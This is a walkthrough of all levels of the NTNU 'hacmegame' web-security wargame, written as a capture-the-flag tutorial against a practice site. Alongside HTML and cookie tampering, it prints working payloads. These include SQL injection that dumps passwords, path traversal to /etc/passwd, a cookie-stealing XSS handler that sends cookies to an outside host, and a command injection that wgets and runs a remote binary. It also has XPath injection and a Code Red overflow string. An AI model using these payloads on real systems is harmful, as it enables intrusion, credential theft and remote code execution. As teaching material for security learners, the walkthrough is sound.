Yes, this is another security/hacker site with challenges. This one is developed by NTNU (Norwegian University of Science and Technology).
A friend of mine asked me for some help on this site, so I thought I could make a tutorial/walkthrough for the whole thing instead.
Tools I will be using: Mozilla Firefox with Web Developer and Firebug addons
You should know basic HTML and maybe some JavaScript before you try start on the challenges.
The site contains 8 levels by which there are 6 challenges on each level.
Level 1: The novice test
This is an extreme easy one, just view the source (hit ctrl+u) and you will find
Level 1: A slightly more interesting challenge
Same as before, view the source and find
This looks like a MAC-address, which contains hex. Let's convert it to decimal and then again to ASCII and see what happens:
<?php
$x = array('38','39','47','7a','55','4f');
$a = array_map('hexdec', $x);
$b = array_map('chr', $a);
print join('',$b);
?>
The code returns 89GzUO which is the password (your password could be different)
Level 1: Confirm order
First write something random in the input fields then use web developer to edit the html (Misc -> Edit HTML).
Find the <input type="hidden"> and change the value to 0, then hit the submit button. Done.
Level 1: Random number puzzle
Here we need to get the current sum equal to the objective sum. Let's edit the html again and find:
<select id="addition" name="addition">
<option value="775">775</option>
<option value="926">926</option>
<option value="205">205</option>
</select>
For me the objective sum is 2282. So change the html to:
<select id="addition" name="addition">
<option value="2282">2282</option>
<option value="926">926</option>
<option value="205">205</option>
</select>
You also need to change the subtraction form or else it will subtract 570 from it, and we end up with 2282 - 570.
So we simply make the first value to 0.
<select id="subtraction" name="subtraction">
<option value="0">0</option>
<option value="177">177</option>
<option value="891">891</option>
</select>
Hit submit and you are done.
Level 1: Digging journalism
Here we need to find the newest press release pdf file. This is just simple bruteforce.
We can see that the newest is: http://www.hacmegame.org/hacmegame/challenges/press_release_09_q1.pdf
Let's try:
http://www.hacmegame.org/hacmegame/challenges/press_release_09_q2.pdf
Success!
Level 1: The Garden of Eden
This is a weird challenge, but let us turn into an angel!
We can use Web Developer again here. (Cookies -> View cookie information)
Find the cookie with the name "accessClass" and change the value from "human" to "angel".
Hit "Enter paradise" and you are done with Level 1 (Warm up)
Level 2: Are you still with us?
View source and we find a md5 hash, google it and we get the answer right away: "md5:2e33bc25e7d8e08704d2a9498b974868:pusa"
Level 2: Accessing secret information
We get the text "hvs doggkcfr bssrsr hc sbhsf hvwg gsqfsh rohopogs ct ucjsfbasbh gsqfshg wg pohhsfm - yssd hvs wbtcfaohwcb jsfm gsqfsh".
Looks like rot13, but It isn't. So let us try a script which runs rot 1 to 26...
<?php
$string = 'hvs doggkcfr bssrsr hc sbhsf hvwg gsqfsh rohopogs ct ucjsfbasbh gsqfshg wg pohhsfm - yssd hvs wbtcfaohwcb jsfm gsqfsh';
function str_rot($s, $n = 13) {
$n = (int)$n % 26;
if (!$n) return $s;
for ($i = 0, $l = strlen($s); $i < $l; $i++) {
$c = ord($s[$i]);
if ($c >= 97 && $c <= 122) {
$s[$i] = chr(($c - 71 + $n) % 26 + 97);
} else if ($c >= 65 && $c <= 90) {
$s[$i] = chr(($c - 39 + $n) % 26 + 65);
}
}
return $s;
}
for ($i = 1; $i < 26; $i++) {
print "($i) " . str_rot($string, $i) . "\n\n";
}
?>
Output:
echofish@ubuntu:~/Desktop$ php sadf.php
(1) iwt ephhldgs cttsts id tcitg iwxh htrgti spipqpht du vdktgcbtci htrgtih xh qpiitgn - ztte iwt xcudgbpixdc ktgn htrgti
(2) jxu fqiimeht duutut je udjuh jxyi iushuj tqjqrqiu ev weluhdcudj iushuji yi rqjjuho - auuf jxu ydvehcqjyed luho iushuj
(3) kyv grjjnfiu evvuvu kf vekvi kyzj jvtivk urkrsrjv fw xfmviedvek jvtivkj zj srkkvip - bvvg kyv zewfidrkzfe mvip jvtivk
(4) lzw hskkogjv fwwvwv lg wflwj lzak kwujwl vslstskw gx ygnwjfewfl kwujwlk ak tsllwjq - cwwh lzw afxgjeslagf nwjq kwujwl
(5) max itllphkw gxxwxw mh xgmxk mabl lxvkxm wtmtutlx hy zhoxkgfxgm lxvkxml bl utmmxkr - dxxi max bgyhkftmbhg oxkr lxvkxm
(6) nby jummqilx hyyxyx ni yhnyl nbcm mywlyn xunuvumy iz aipylhgyhn mywlynm cm vunnyls - eyyj nby chzilguncih pyls mywlyn
(7) ocz kvnnrjmy izzyzy oj ziozm ocdn nzxmzo yvovwvnz ja bjqzmihzio nzxmzon dn wvoozmt - fzzk ocz diajmhvodji qzmt nzxmzo
(8) pda lwoosknz jaazaz pk ajpan pdeo oaynap zwpwxwoa kb ckranjiajp oaynapo eo xwppanu - gaal pda ejbkniwpekj ranu oaynap
(9) qeb mxpptloa kbbaba ql bkqbo qefp pbzobq axqxyxpb lc dlsbokjbkq pbzobqp fp yxqqbov - hbbm qeb fkclojxqflk sbov pbzobq
(10) rfc nyqqumpb lccbcb rm clrcp rfgq qcapcr byryzyqc md emtcplkclr qcapcrq gq zyrrcpw - iccn rfc gldmpkyrgml tcpw qcapcr
(11) sgd ozrrvnqc mddcdc sn dmsdq sghr rdbqds czszazrd ne fnudqmldms rdbqdsr hr azssdqx - jddo sgd hmenqlzshnm udqx rdbqds
(12) the password needed to enter this secret database of government secrets is battery - keep the information very secret
(13) uif qbttxpse offefe up foufs uijt tfdsfu ebubcbtf pg hpwfsonfou tfdsfut jt cbuufsz - lffq uif jogpsnbujpo wfsz tfdsfu
(14) vjg rcuuyqtf pggfgf vq gpvgt vjku ugetgv fcvcdcug qh iqxgtpogpv ugetgvu ku dcvvgta - mggr vjg kphqtocvkqp xgta ugetgv
(15) wkh sdvvzrug qhhghg wr hqwhu wklv vhfuhw gdwdedvh ri jryhuqphqw vhfuhwv lv edwwhub - nhhs wkh lqirupdwlrq yhub vhfuhw
(16) xli tewwasvh riihih xs irxiv xlmw wigvix hexefewi sj kszivrqirx wigvixw mw fexxivc - oiit xli mrjsvqexmsr zivc wigvix
(17) ymj ufxxbtwi sjjiji yt jsyjw ymnx xjhwjy ifyfgfxj tk ltajwsrjsy xjhwjyx nx gfyyjwd - pjju ymj nsktwrfynts ajwd xjhwjy
(18) znk vgyycuxj tkkjkj zu ktzkx znoy ykixkz jgzghgyk ul mubkxtsktz ykixkzy oy hgzzkxe - qkkv znk otluxsgzout bkxe ykixkz
(19) aol whzzdvyk ullklk av lualy aopz zljyla khahihzl vm nvclyutlua zljylaz pz ihaalyf - rllw aol pumvythapvu clyf zljyla
(20) bpm xiaaewzl vmmlml bw mvbmz bpqa amkzmb libijiam wn owdmzvumvb amkzmba qa jibbmzg - smmx bpm qvnwzuibqwv dmzg amkzmb
(21) cqn yjbbfxam wnnmnm cx nwcna cqrb bnlanc mjcjkjbn xo pxenawvnwc bnlancb rb kjccnah - tnny cqn rwoxavjcrxw enah bnlanc
(22) dro zkccgybn xoonon dy oxdob drsc combod nkdklkco yp qyfobxwoxd combodc sc lkddobi - uooz dro sxpybwkdsyx fobi combod
(23) esp alddhzco yppopo ez pyepc estd dpncpe olelmldp zq rzgpcyxpye dpncped td mleepcj - vppa esp tyqzcxletzy gpcj dpncpe
(24) ftq bmeeiadp zqqpqp fa qzfqd ftue eqodqf pmfmnmeq ar sahqdzyqzf eqodqfe ue nmffqdk - wqqb ftq uzradymfuaz hqdk eqodqf
(25) gur cnffjbeq arrqrq gb ragre guvf frperg qngnonfr bs tbireazrag frpergf vf onggrel - xrrc gur vasbezngvba irel frperg
Looks like rot12 to me ;>
Level 2: We Make Webpages Inc
Edit the HTML with Web Developer and find this code:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS12.html" onsubmit="return checkValid(document.getElementById('email'));">
Remove onsubmit so the code looks like this:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS12.html">
Write some random email address and hit submit.
Level 2: Free pets
Select maximum pets in the select boxes.
Change this
<input id="sum1" name="sum1" readonly="readonly" value="550" size="6" type="text">
<input id="sum2" name="sum2" readonly="readonly" value="29" size="6" type="text">
to this
<input id="sum1" name="sum1" readonly="readonly" value="0" size="6" type="text">
<input id="sum2" name="sum2" readonly="readonly" value="0" size="6" type="text">
and this
<input id="totalDummySum" name="totalDummySum" disabled="disabled" value="579" size="6" type="text">
to this
<input id="totalDummySum" name="totalDummySum" value="0" size="6" type="text">
Hit buy and you will get those pets for free!
Level 2: Vladimir Vladimirovitsj Putin's guestbook
Write "%3cscript%3e" in his guestbook and you are done (http://www.w3schools.com/TAGS/ref_urlencode.asp)
Done with Level 2!
Level 3: Lottery lothario
Edit the html with Web Developer (Misc -> Edit HTML)
Find the code:
<select id="tickets" onchange="return process()">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
And change to:
<select id="tickets">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="2147483647">5</option>
</select>
Notice we change the value and removed the JavaScript function.
Then find:
<input id="num" name="num" value="5" type="hidden">
And change to:
<input id="num" name="num" value="2147483647" type="hidden">
Then select 5 in the select box and hit buy. Done.
Level 3: VIP
After holding over some available seats, you find that the link is ?row=X&seat=Y.
Now it's just to figure out the row and seat number for a VIP seat and go to the URL manualy.
http://www.hacmegame.org/hacmegame/challenges/ChallengeS38.html?row=6&seat=3
Easy peasy :)
Level 3: Still hanging in there?
View the source and you will find a sha1 hash which I googled and I got:
"gsg : c53118b2b90b4d67eeaef61ea37344ed5c09f7c7"
Level 3: Text analysis was your favorite subject at school
So we get this text:
jf cdo vjonuhogv lgofgavdl fkdf ogrgadu jqyhaxdu zsf vjagnf nhqfdnfo kdrg zggq xdvg cjfk bhujfjndu agbagogqfdfjrgo hy fkg rjgf nhqm jq xhonhc - uhm jq cjfk bdoochav dyydja fh agdv fkg vgfdjuo
This is the challenge I used the most time on. It's a slow process, which makes you try and replace each char with another.
I ended up with this script:
$string = 'yf cbo syodhwoas uaofamsbu fvbf oakambh ygrwmqbh tzf symadf dwgfbdfo vbka taag qbsa cyfv jwhyfydbh majmaoagfbfykao wr fva kyaf dwge yg qwodwc - hwe yg cyfv jboocwms tbffamu fw mabs fva safbyho';
$x = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', ' ');
$y = array('e','a','w','c','e','t','n','l','i','p','v','l','r','n','s','p','m','r','d','b','y','h','o','x','i','z', ' ');
$string_arr = str_split($string);
$newstring = '';
foreach($string_arr as $val) {
$newstring .= $y[array_search($val, $x)];
}
print $newstring;
Here is some of the process:
echofish@ubuntu:~/Desktop$ php sadf.php
it cas sisdhwsas uastamsau tvat sakamah igrwmqah tzt simadt dwgtadts vaka taag qasa citv pwhitidah mapmasagtatikas wr tva kiat dwge ig qwsdwc a hwe ig citv passcwms tattamu tw maas tva sataihs
echofish@ubuntu:~/Desktop$ php sadf.php
it was sisdhosas uastamsau tvat sakamah igromqah tzt simadt dogtadts vaka taag qasa witv pohitidah mapmasagtatikas or tva kiat doge ig qosdow a hoe ig witv passwoms tattamu to maas tva sataihs
echofish@ubuntu:~/Desktop$ php sadf.php
it was disdhosad uastardau tvat sakarah igrorqah tzt diradt dogtadts vaka taag qada witv pohitidah raprasagtatikas or tva kiat doge ig qosdow a hoe ig witv password tattaru to raad tva dataihs
echofish@ubuntu:~/Desktop$ php sadf.php
it was disdhosad uastardau that sakarah igrorqah tzt diradt dogtadts haka taag qada with pohitidah raprasagtatikas or tha kiat doge ig qosdow a hoe ig with password tattaru to raad tha dataihs
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosad uastardau that sakaral igrorqal tzt diract cogtacts haka taag qada with political raprasagtatikas or tha kiat coge ig qoscow a loe ig with password tattaru to raad tha datails
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosad uastardau that sakaral inrorqal tzt diract contacts haka taan qada with political raprasantatikas or tha kiat cone in qoscow a loe in with password tattaru to raad tha datails
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed uesterdau that sekeral inrorqal tzt direct contacts hake teen qade with political representatikes or the kiet cone in qoscow e loe in with password tatteru to read the details
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed uesterdau that several inrorqal tzt direct contacts have teen qade with political representatives or the viet cone in qoscow e loe in with password tatteru to read the details
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed uesterdau that several inrorqal bzt direct contacts have been qade with political representatives or the viet cone in qoscow e loe in with password batteru to read the details
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed uesterdau that several inrormal bzt direct contacts have been made with political representatives or the viet cone in moscow e loe in with password batteru to read the details
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed yesterday that several inrormal bzt direct contacts have been made with political representatives or the viet cone in moscow e loe in with password battery to read the details
Didn't need to decrypt further :-)
A little weird that the password were used before...
Level 3: George Bush's guestbook
Looked like they stripped HTML tags, so I tried <<script>script> which worked!
Now on to level 4...
Level 4: Ship some pets far out
Open Firebug. Inspect the HTML, and you will find that there are some JavaScript files being included.
Let's take a look at those.
function validatePetshopAddress(){
if (document.getElementById('name').value == "") {
msg("input_error", "error", "Please enter your name");
return false;
} else if (zipCodeToCity() === false) {
msg("input_error", "error", "We don't deliver here");
return false;
} else {
insert();
return true;
}
}
function insert() {
var objForm = document.getElementById("val");
var objInput = document.createElement("input");
objInput.setAttribute('type','hidden');
objInput.setAttribute('name','val');
objInput.setAttribute('value','af883cadbe96b8a16ac8340e264b9f7526b9e5a9e2f249e4d4c641934aae05b5');
objForm.insertBefore(objInput, objForm.firstChild);
}
So what is basicly going on here is that if the address is valid, the insert() function is executed, and the insert function creates an hidden input with a value. So let's take a short cut and just create that hidden input manualy.
Just copy whats inside insert() (between the braces {}) and paste in inside the JavaScript console in your browser.
Now changed the HTML...
Remove the onsubmit:
<form id="val" method="post" action="/hacmegame/challenges/ChallengeS11.html" onsubmit="return validatePetshopAddress()">
It should loook like this:
<form id="val" method="post" action="/hacmegame/challenges/ChallengeS11.html">
Then find:
<select onchange="return zipCodeToCity()" id="zipcode" name="zipcode">
<option value="0"> </option>
<option value="7003">7003</option>
<option value="7007">7007</option>
<option value="7056">7056</option>
<option value="7092">7092</option>
<option value="7080">7080</option>
<option value="7082">7082</option>
<option value="7098">7098</option>
</select>
Remove the onchange and add another <option> to it:
<select id="zipcode" name="zipcode">
<option value="0"> </option>
<option value="7003">7003</option>
<option value="7007">7007</option>
<option value="7056">7056</option>
<option value="7092">7092</option>
<option value="7080">7080</option>
<option value="7082">7082</option>
<option value="7098">7098</option>
<option value="1337">1337</option>
</select>
Now we need to make the city input writeable:
Replace:
<input name="city" id="city" size="15" readonly="true" type="text">
with:
<input name="city" id="city" size="15" type="text">
Select 99 "real midget sheeps", write a random name, select 1337 as the ZIP code, and write something random for city. Hit the submit button and win!
Level 4: Doctor Online for humans only
View cookie information with Web Developer and find the cookie named "cptch". Mine has the value 31:46:64:58:38.
Then we can see what happens when we turn this into ASCII.
php > print chr(31).chr(46).chr(64).chr(58).chr(38);
�.@:&
That didn't look right. Let's assume it's hex and make it decimal before we turn it into ASCII:
php > print chr(hexdec(31)).chr(hexdec(46)).chr(hexdec(64)).chr(hexdec(58)).chr(hexdec(38));
1FdX8
Yep, it worked.
Level 4: Access the exam
We are given a HTTP request and what we are after is this:
Authorization Basic Z29yYmFjaGV2OnFKOHIyMk4xQ0Q=
This kind of encryption is base64. I used this website to decrypt it:
gorbachev:qJ8r22N1CD
Level 4: The break-in
Nothing useful in the source, I reccon this is an SQL-injection challenge. Let's try with the perfect school example to inject.
Write this as username and password:
' OR '1'='1
Success!
Level 4: My Sick Book Face
View cookie information with Web Developer and you will find a cookie named "sId" with a unique id: 6d:6f:68:63:6e:75:a0
What happens if we change the id to the previous one, which would be: 6d:6f:68:63:6e:75:9f
Reload the page and we get a nice green text which states "Completed"
Level 4: Industrial espionage
By holding over the link we can see that the include script is extreme poor and insecure, It would look something like:
include ($_GET['read']);
Here we can include exactly what we want. Then lets go for the unix password.
Click on the admin link and replace admin.html in the address bar with:
../../../etc/passwd
The url should look like this now: http://www.hacmegame.org/hacmegame/challenges/ChallengeS26.html?read=../../../etc/passwd
Hit enter and you the passwd file is included and here is the content:
nikita:XltRLNV1
Go to the admin page again and write "nikita" as username and "XltRLNV1" as password.
Now we are done with level 4...
Level 5: iBay - free toilet paper
View cookie information with Web Developer.
Find the cookie named "lastFinishedStep" and change its value to 2.
Now go to:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS18.html?step=3
Level 5: Breaking the barrier
In the source we see that a javascript file is included with the name:
['\x6A\x73\x2F\x74\x6F\x70\x73\x65\x63\x72\x65\x74\x73\x75\x70\x65\x72\x64\x75\x70\x65\x72\x2E\x6A\x73'][0x0]
Let us find out the name in plain text...
In a new tab enter:
javascript:alert("['\x6A\x73\x2F\x74\x6F\x70\x73\x65\x63\x72\x65\x74\x73\x75\x70\x65\x72\x64\x75\x70\x65\x72\x2E\x6A\x73'][0x0]");
Result: ['js/topsecretsuperduper.js'][0x0]
Here it is:
http://www.hacmegame.org/hacmegame/js/topsecretsuperduper.js
Now take a look at this script:
function validate_form(thisform) {
with (thisform) {
if (validate_required(inputfield, "input_error") == false) {
inputfield.focus();
return false;
} else {
insert();
return true;
}
}
}
function insert() {
var objForm = document.getElementById("val");
var objInput = document.createElement("input");
objInput.setAttribute('type','hidden');
objInput.setAttribute('name','val');
objInput.setAttribute('value','0fc826d06103c0e423e9bac849b36e91c05506a5708dd8b9bd1f596e1ef93c9a');
objForm.insertBefore(objInput, objForm.firstChild);
}
Run that insert() command in the javascript console or in Firebug.
Now edit the HTML. Replace this:
<form id="val" method="post" action="/hacmegame/challenges/ChallengeS42.html?hs=1" onsubmit="return validate_form(this);">
with this:
<form id="val" method="post" action="/hacmegame/challenges/ChallengeS42.html?hs=1">
Then write <script> in the input and then submit.
Level 5: SMS tool
The form:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS28.html">
<h3>Send SMS</h3>
<!-- } else if(request.getParameter("sms").length()>160 && !request.getParameter("admin").equals("true")) { -->
<span id="*.errors" class="error">The SMS message is too long.</span>
<p>Free SMS messages left : 0</p>
<p>Recipient's number: <br><input id="number" name="number" type="text" value="12345678" maxlength="8"/></p>
<p>
Message:<br />
<textarea id="sms" name="sms" onkeyup="displayCharLenght('sms', 'smsLen', 160)" onfocus="displayCharLenght('sms', 'smsLen', 160)"></textarea><br />
SMS length: <b><span id="smsLen">0</span></b>/160<br />
</p>
<p><input type="submit" class="submit" value="Send SMS" /></p>
</form>
The comment suggests that to become an admin there should be an input named "admin" which needs to be sat.
So simply add
<input name="admin" value="true" />
to the form.
Then change the value of the displayCharlenght() function:
onkeyup="displayCharLenght('sms', 'smsLen', 9999999)" onfocus="displayCharLenght('sms', 'smsLen', 9999)"
(I dont think this step is neccessary, since you are an admin, but I did it.)
Enter a large text on the form and submit.
Level 5: FaceSpace - forum spammers
Snatch the url to delete the forum thread: ?delete=19423
Then write in the comment field:
<img src="?delete=19423" />
Level 5: FaceSpace - a space for your face
This SQL should get the password instead of the status:
SELECT username,password as status, rank FROM user--
Complete URL:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS22.html?o=username;SELECT%20username,password%20as%20status,%20rank%20FROM%20user--
And we get a list of users with password, here is one:
gorbatsjov:6ECkGsQd
Level 6: Terminate the register of taxpayers
The form runs the JavaScript function ff32() when submitted:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS14.html" onsubmit="return ff32();">
Remove the onsubmit so it looks like this:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS14.html">
The ff32() function are inluded at the header of the html:
<script type="text/javascript" src="/hacmegame/js/taxsearch.js" ></script>
Let's take a look at the function:
function ff32(_0xfc4dx7)
{
var _0xfc4dx8="";
_0xfc4dx8+=ff92(document["getElementById"]("fname")["value"]);
_0xfc4dx8+=ff12(document["getElementById"]("lname")["value"]);
_0xfc4dx8+=ff88(document["getElementById"]("zipcode")["value"]);
if(_0xfc4dx8!="")
{
alert(_0xfc4dx8);
return false;
}
document["getElementById"]("verification")["value"]=SHA256(navigator["userAgent"]);
return true;
}
On success it sets the value for a hidden input to be SHA256(navigator["userAgent"])
For me navigator["userAgent"]) returns:
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
and SHA256 of that:
c3d865842b6e9c392cbad25ae3e83814edc42c715013deb0599041b43405148f
We can set the value for the input manualy by writing this in Firebug or JavaScript console:
document["getElementById"]("verification")["value"]=SHA256(navigator["userAgent"]);
or just insert the value directly into the html.
Execute it.
Now leave the input fields blank in the form and hit the submit button. Success!
Level 6: iBay - free bazooka
Download the RefControl plugin for Firefox here
Open RefControl and add the following:
Site: "www.hacmegame.com",
Action:"http://www.hacmegame.org/hacmegame/challenges/ChallengeS19.html?step=3"
Go to:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS19.html?step=4 and win!
Level 6: Swedian sends you high up in the sky
We have only the <b> html tag for this one and the hint suggest onmouseover. Lets also use document.cookie for this one.
<b onmouseover="javascript:location.href='http://myhaxorsite.tk?cookiedata=' + document.cookie';">asdf</b>
Nice little challenge :-)
Level 6: Breaking FaceSpace
Time to inject some SQL.
This SQL should get the password instead of the status:
[sql]SELECT rank,username,password as status FROM user--[/sql]
Here is the complete url:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS23.html?offset=50;select%20rank,username,password%20as%20status%20FROM%20user--
Pick a random username and its password. Complete.
Level 6: FaceSpace - write on my floor
Simply write this on your wall:
<img src="?input=asdf&submit=1" />
Since the form is method="get" the input fields are sendt to the url. Now every visitor will go to this link and post 'asdf' on your wall :)
Level 7: Industrial espionage - continued
..%2F..%2F..%2Fetc%2Fpasswd
You can figure out the rest :)
Level 7: Piggybacking
Heh, got this on the first try ;)
;wget http://myhaxorsite.tk/superduperprogram;./superduperprogram
Level 7: Photo Knutson
Time for some more sql injections.
Replace gid in the URL with: ' or '1'='1
Then the URL should look like this:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS16.html?uid='%20or%20'1'='1&gid=61953
Then click on a link at the menu. Then you will see "Me at nude beach 1977". Click on it and done.
Level 7: Illuminati's secret web
Let's take a look at that incredible CMS:
http://www.hacmegame.org/hacmegame/files/cms.php.txt
This is the critical code:
$MODE_CMS_DEBUG = (CmsSetting::get('debug-mode') || CmsUtil::parseToBool($_COOKIE['cms-debug-mode'])) ? true : false;
if($MODE_CMS_DEBUG){
if($_GET['debug_username'])
echo "<!-- " . DatabaseHandler::debugResultToString(DatabaseHandler::query("SELECT * FROM user WHERE username='" . $_GET['debug_username'] . "';")) - " -->";
}
Make a cookie named "cms-debug-mode" with value "1".
Then add to the url in the address bar: ?debug_username=' or '1'='1
Like this: www.hacmegame.org/hacmegame/challenges/ChallengeS8.html?debug_username='%20or%20'1'='1
Hit enter.
Now should I found this in the source:
Login and have fun!
Level 7: Farm Automagical Systems INC
Looks like another sql injection case, and we need to keep in mind to escape quotes.
The standard injection didn't work in the input fields: \' or \'1\'=\'1
Need to think of something else... Hmm, a cookie named sessionID.
Tried to change the value. And I got the error message: "Illegal session id." from the site.
I bought some hints, which gave me nothing at all:
- The login fields them self are secured.
- How does the system identify users?
- A simple injection is all that's needed
- What rhymes with rookie (except your name)?
Then I tried to use the injection with the cookie, and it worked!
So just change the value of the cookie to: \' or \'1\'=\'1
Level 8: The poet
The first thing we see is that files is included raw from the URL.
At the admin page, the URL looks like this:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS30.html?include=admin.php
At the other pages, the URL looks like this:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS30.html?read=poem3.html
So why not try ?read=admin.php
"Illegal file type - I don't like you." Ups :/
Smells like poison nullbyte, so lets try this then: ?read=admin.php%00.html
<?php
session_start();
if ($_SESSION['authenticated'] || $_POST['username'] == 'brezhnev' && $_POST['password'] == 'c2SIdZX5') {
$_SESSION['authenticated'] = true;
printAdminForm();
} else {
printLoginForm();
}
?>
Yeap. That easy.
To read more about poison nullbyte: http://insecure.org/news/P55-07.txt
Level 8: Ultra quick index search
Googled: "Red Code Inc's UQI-search is powered by Microsoft Internet Information Services (IIS) 5.0, Microsoft Index Server 2.0 and Microsoft Windows 2000 Server."
Found: http://www.cert.org/advisories/CA-2001-19.html and http://en.wikipedia.org/wiki/Code_Red_(computer_worm)
Used: http://www.hacmegame.org/hacmegame/challenges/default.ida?
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u909
0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
Done.
Level 8: All your emails are belong to us
Tried first: asdf@asdf.com';select * from mails
That gave me this error:
Unexpected token: ; in statement [INSERT INTO mailinglist (email) VALUES ('asdf@asdf.com';]
Got some useful information, lets try this then:
asdf@asdf.com');select * from mailinglist--
Success.
Level 8: Extraterrestrial contact
Assuming this is yet another sql injecton challenge I tried:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS25.html?errorid=;
Then I got this error message:
java.sql.SQLException: Unexpected token: ; in statement [SELECT text FROM error WHERE id = ;]
Now I know what the query looks like.
Trying to get the query to look like this so I can log in with asdf:asdf
SELECT text FROM error WHERE id = 0;INSERT INTO user (username,password) VALUES ('asdf','asdf')
with: ?errorid=0;INSERT%20INTO%20user%20(username,password)%20values%20('asdf','asdf')
But I get: "A unknown error occurred" :/
New tactic:
?errorid=0;SELECT username as text FROM user
Oh, it printed out "josef" :)
And of course we need the password too:
?errorid=0;SELECT password as text FROM user
Which printed out: OQ2UeotG
Success!
Level 8: Fresh Fish Online
Hints say something about XPath.
Found this: http://www.ibm.com/developerworks/xml/library/x-xpathinjection/index.html and this http://www.ethicalhacker.net/content/view/185/24/
Read some and tried: ?item='] | /* | /foo[bar='
Which resulted in:
gorbatsjovsomerlmikhailahpnfngorbachevejzvmu: Fresh salmon of last weekThis is the freshest salmon we offer in our shop. Delivery time by mail approximately three days. 65Smelly codSmells like heaven. Can't be sent by mail because of undefined reasons, will be sent with delivery boy. Delivery time approximately two years.5
I think I got all the usernames and passwords. Lets try 'gorbatsjov' as username and 'somerl' as password.
There you go. All levels complete :)